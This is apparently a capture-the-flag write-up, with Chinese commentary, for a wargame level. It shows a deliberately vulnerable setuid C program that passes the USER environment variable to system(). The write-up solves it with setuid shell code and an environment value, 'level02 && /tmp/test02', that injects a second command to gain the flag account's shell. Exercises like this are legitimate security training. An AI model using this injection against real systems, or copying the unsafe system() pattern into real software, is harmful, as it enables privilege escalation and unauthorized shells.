There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level02 account with the password level02 . Files for this level can be found in /home/flag02.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
char *buffer;
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
buffer = NULL;
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);
system(buffer);
}
这个题目其实很简单,突破点就在于getenv("USER")
我们可以通过上一节的代码:
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",(char *)0)
return 0;
}
生成的可执行文件来完成这个练习。
export USER=“level02 && /tmp/test02”
这样运行可执行程序的时候就会返回一个flag02的shell,在上面运行getflag就可以打印出成功获取了权限。